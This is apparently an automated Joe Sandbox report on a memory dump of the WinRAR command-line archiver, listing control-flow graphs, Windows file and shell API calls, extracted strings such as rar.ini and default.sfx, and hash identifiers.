                                                                                                                                                                                                                              control_flow_graph 1715 7ff6256b7a5b-7ff6256b7a5e 1716 7ff6256b7a60-7ff6256b7a66 1715->1716 1717 7ff6256b7a68 1715->1717 1716->1717 1718 7ff6256b7a6b-7ff6256b7a7c 1716->1718 1717->1718 1719 7ff6256b7a7e-7ff6256b7a81 1718->1719 1720 7ff6256b7aa8 1718->1720 1722 7ff6256b7a83-7ff6256b7a86 1719->1722 1723 7ff6256b7a88-7ff6256b7a8b 1719->1723 1721 7ff6256b7aab-7ff6256b7ab8 1720->1721 1724 7ff6256b7ac8-7ff6256b7acb 1721->1724 1725 7ff6256b7aba-7ff6256b7abd 1721->1725 1722->1720 1722->1723 1726 7ff6256b7aa4-7ff6256b7aa6 1723->1726 1727 7ff6256b7a8d-7ff6256b7a90 1723->1727 1729 7ff6256b7acf-7ff6256b7ad1 1724->1729 1725->1724 1728 7ff6256b7abf-7ff6256b7ac6 1725->1728 1726->1721 1727->1720 1730 7ff6256b7a92-7ff6256b7a99 1727->1730 1728->1729 1731 7ff6256b7ad3-7ff6256b7ae6 1729->1731 1732 7ff6256b7b2a-7ff6256b7bb0 call 7ff6256d1d34 call 7ff6256b3f04 1729->1732 1730->1726 1733 7ff6256b7a9b-7ff6256b7aa2 1730->1733 1734 7ff6256b7ae8-7ff6256b7af2 call 7ff6256c9be0 1731->1734 1735 7ff6256b7b0a-7ff6256b7b27 1731->1735 1744 7ff6256b7bb2-7ff6256b7bba 1732->1744 1745 7ff6256b7bbc 1732->1745 1733->1720 1733->1726 1739 7ff6256b7af7-7ff6256b7b02 1734->1739 1735->1732 1739->1735 1744->1745 1746 7ff6256b7bbf-7ff6256b7bc9 1744->1746 1745->1746 1747 7ff6256b7bda-7ff6256b7c06 call 7ff6256bb540 1746->1747 1748 7ff6256b7bcb-7ff6256b7bd5 call 7ff6256d1e1c 1746->1748 1752 7ff6256b7c40 1747->1752 1753 7ff6256b7c08-7ff6256b7c0f 1747->1753 1748->1747 1754 7ff6256b7c44-7ff6256b7c5a call 7ff6256baa68 1752->1754 1753->1752 1755 7ff6256b7c11-7ff6256b7c14 1753->1755 1760 7ff6256b7c85-7ff6256b7c97 call 7ff6256bb540 1754->1760 1761 7ff6256b7c5c-7ff6256b7c6a 1754->1761 1755->1752 1757 7ff6256b7c16-7ff6256b7c2b 1755->1757 1757->1754 1759 7ff6256b7c2d-7ff6256b7c3e call 7ff625709b98 1757->1759 1759->1754 1767 7ff6256b7c9c-7ff6256b7c9f 1760->1767 1761->1760 1764 7ff6256b7c6c-7ff6256b7c7e call 7ff6256b8d98 1761->1764 1764->1760 1769 7ff6256b7fa4-7ff6256b7fbe 1767->1769 1770 7ff6256b7ca5-7ff6256b7cfb call 7ff6256e9354 call 7ff6256d6378 * 2 1767->1770 1777 7ff6256b7d17-7ff6256b7d1f 1770->1777 1778 7ff6256b7cfd-7ff6256b7d10 call 7ff6256b5414 1770->1778 1780 7ff6256b7d25-7ff6256b7d28 1777->1780 1781 7ff6256b7de2-7ff6256b7de6 1777->1781 1778->1777 1780->1781 1785 7ff6256b7d2e-7ff6256b7d36 1780->1785 1783 7ff6256b7e4e-7ff6256b7e68 call 7ff6256e9958 1781->1783 1784 7ff6256b7de8-7ff6256b7e49 call 7ff6256e98dc 1781->1784 1794 7ff6256b7e6a-7ff6256b7e84 1783->1794 1795 7ff6256b7e8b-7ff6256b7e8e 1783->1795 1784->1783 1788 7ff6256b7d38-7ff6256b7d49 call 7ff62570a444 1785->1788 1789 7ff6256b7d59-7ff6256b7d6a call 7ff62570a444 1785->1789 1801 7ff6256b7d57 1788->1801 1802 7ff6256b7d4b-7ff6256b7d56 call 7ff6256d8ae8 1788->1802 1797 7ff6256b7d78-7ff6256b7dc6 1789->1797 1798 7ff6256b7d6c-7ff6256b7d77 call 7ff6256dcf8c 1789->1798 1794->1795 1799 7ff6256b7e90-7ff6256b7e9a call 7ff6256e9990 1795->1799 1800 7ff6256b7e9f-7ff6256b7eb8 call 7ff6256b1204 1795->1800 1797->1781 1823 7ff6256b7dc8-7ff6256b7de1 call 7ff6256b1314 call 7ff62570ba34 1797->1823 1798->1797 1799->1800 1812 7ff6256b7ec8-7ff6256b7ed9 call 7ff6256e941c 1800->1812 1801->1797 1802->1801 1817 7ff6256b7eba-7ff6256b7ec3 call 7ff6256e9680 1812->1817 1818 7ff6256b7edb-7ff6256b7f9f call 7ff6256b1400 call 7ff6256d6424 call 7ff6256bb540 1812->1818 1817->1812 1818->1769 1823->1781
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: H9
                                                                                                                                                                                                                              • API String ID: 0-2207570329
                                                                                                                                                                                                                              • Opcode ID: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
                                                                                                                                                                                                                              • Instruction ID: a8c9a0bb3451daff44680fb30cc39c5884295a06f9a692e8c754220210adf882
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EE1E2A2A0969285EF20EF25E844BFD23A5FB45B8CF454435EE0D933A5DF38E944D301

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1858 7ff6256d2574-7ff6256d259c 1859 7ff6256d25a5-7ff6256d25a9 1858->1859 1860 7ff6256d259e-7ff6256d25a0 1858->1860 1862 7ff6256d25ba-7ff6256d25c6 1859->1862 1863 7ff6256d25ab-7ff6256d25b6 GetStdHandle 1859->1863 1861 7ff6256d273a-7ff6256d2756 1860->1861 1864 7ff6256d25c8-7ff6256d25cd 1862->1864 1865 7ff6256d2619-7ff6256d2637 WriteFile 1862->1865 1863->1862 1866 7ff6256d2644-7ff6256d2648 1864->1866 1867 7ff6256d25cf-7ff6256d2609 WriteFile 1864->1867 1868 7ff6256d263b-7ff6256d263e 1865->1868 1869 7ff6256d2733-7ff6256d2737 1866->1869 1870 7ff6256d264e-7ff6256d2652 1866->1870 1867->1866 1871 7ff6256d260b-7ff6256d2615 1867->1871 1868->1866 1868->1869 1869->1861 1870->1869 1872 7ff6256d2658-7ff6256d2692 GetLastError call 7ff6256d3144 SetLastError 1870->1872 1871->1867 1873 7ff6256d2617 1871->1873 1878 7ff6256d2694-7ff6256d26a2 1872->1878 1879 7ff6256d26bc-7ff6256d26d0 call 7ff6256cc95c 1872->1879 1873->1868 1878->1879 1880 7ff6256d26a4-7ff6256d26ab 1878->1880 1884 7ff6256d26d2-7ff6256d26db 1879->1884 1885 7ff6256d2721-7ff6256d272e call 7ff6256ccf14 1879->1885 1880->1879 1882 7ff6256d26ad-7ff6256d26b7 call 7ff6256ccf34 1880->1882 1882->1879 1884->1862 1887 7ff6256d26e1-7ff6256d26e3 1884->1887 1885->1869 1887->1862 1889 7ff6256d26e9-7ff6256d271c 1887->1889 1889->1862
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3350704910-0
                                                                                                                                                                                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction ID: 813273fc632e9989e7da55893505923ffc763abd4d061b4314e9533ef8d9a759
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B151B126A0964287EE74DF26E81437A63A1FF48F84F240535DA5E87AB5CF3CE845C602

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1894 7ff6256d1e80-7ff6256d1ebb call 7ff62570a5a0 1897 7ff6256d1ebd-7ff6256d1ec1 1894->1897 1898 7ff6256d1ec8 1894->1898 1897->1898 1899 7ff6256d1ec3-7ff6256d1ec6 1897->1899 1900 7ff6256d1ecb-7ff6256d1f57 CreateFileW 1898->1900 1899->1900 1901 7ff6256d1fcd-7ff6256d1fd1 1900->1901 1902 7ff6256d1f59-7ff6256d1f76 GetLastError call 7ff6256e4534 1900->1902 1903 7ff6256d1fd3-7ff6256d1fd7 1901->1903 1904 7ff6256d1ff7-7ff6256d200f 1901->1904 1912 7ff6256d1fba 1902->1912 1913 7ff6256d1f78-7ff6256d1fb6 CreateFileW GetLastError 1902->1913 1903->1904 1906 7ff6256d1fd9-7ff6256d1ff1 SetFileTime 1903->1906 1907 7ff6256d2011-7ff6256d2022 call 7ff6256fa9e8 1904->1907 1908 7ff6256d2027-7ff6256d204b call 7ff62570a610 1904->1908 1906->1904 1907->1908 1914 7ff6256d1fbf-7ff6256d1fc1 1912->1914 1913->1901 1916 7ff6256d1fb8 1913->1916 1914->1901 1917 7ff6256d1fc3 1914->1917 1916->1914 1917->1901
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction ID: 6dcdcdf253a3ef7b1fec9dc179a89c680fb51bf79816ca61ae838a95fbdabb3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B411472A1968146FB708F24E9057A96AD0B749FB8F140734DE7982BD8DFBDC8458B01

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                              • API String ID: 233258989-2235180025
                                                                                                                                                                                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction ID: a7ad20197aa6444aab729f18c8ae64b2b6349e7648fed548d3161840686d0832
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB41B021A1868281EF24EF25DC141F923A0FF44BA4F441535EA5E83AE6EF7CED55D306

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                              • String ID: rar.lng
                                                                                                                                                                                                                              • API String ID: 553376247-2410228151
                                                                                                                                                                                                                              • Opcode ID: 0cdb54aa40ba2ca26f1ddd7e9615ca47f74f76cd710d464ec92b81866409da64
                                                                                                                                                                                                                              • Instruction ID: af8758b17cedbb84d188ee32a1b912816b6ae96be8dfe68cc3dcfc07bf95b775
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cdb54aa40ba2ca26f1ddd7e9615ca47f74f76cd710d464ec92b81866409da64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87416C21E0928245FE34AF25AC155B923A1BF42F55F580135EA0E8B7F7CE2DEC06A712

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF6256E4432,?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E40C4
                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E40DF
                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF6256E40F1
                                                                                                                                                                                                                                • Part of subcall function 00007FF6256D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6256E413F,?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256D34A0
                                                                                                                                                                                                                                • Part of subcall function 00007FF6256D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6256E413F,?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256D34D5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                              • String ID: WinRAR
                                                                                                                                                                                                                              • API String ID: 977838571-3970807970
                                                                                                                                                                                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction ID: 5c69bff2fb6c503eb43ef4343ff6c23e46bf8acfc2956b556e97e39c35e72d6a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D214D26B09A4281EE609F22AD506BA6360BF89FD5B585031DF4E87B69DE3CD8458701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                                              • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                              • Instruction ID: 0f2d0aa91d16aa6b5f8c4f3e11e1e05fed17b3420b955ee8f931c378b90b86af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10215E21E0E94A81EE708F25E80033962A4BB49F94F304935EA59C76E9CFBDDC819752
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: AFUM$default.sfx
                                                                                                                                                                                                                              • API String ID: 0-2491287583
                                                                                                                                                                                                                              • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction ID: abe38ee7c391730c12c74a00921fbe574ea289a8bbc6302c503bb683ac35101e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D819221E0C68240EE70DF1199492BD22A0BF55F97F448031DE8D87AF6DF6EAC85E752
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
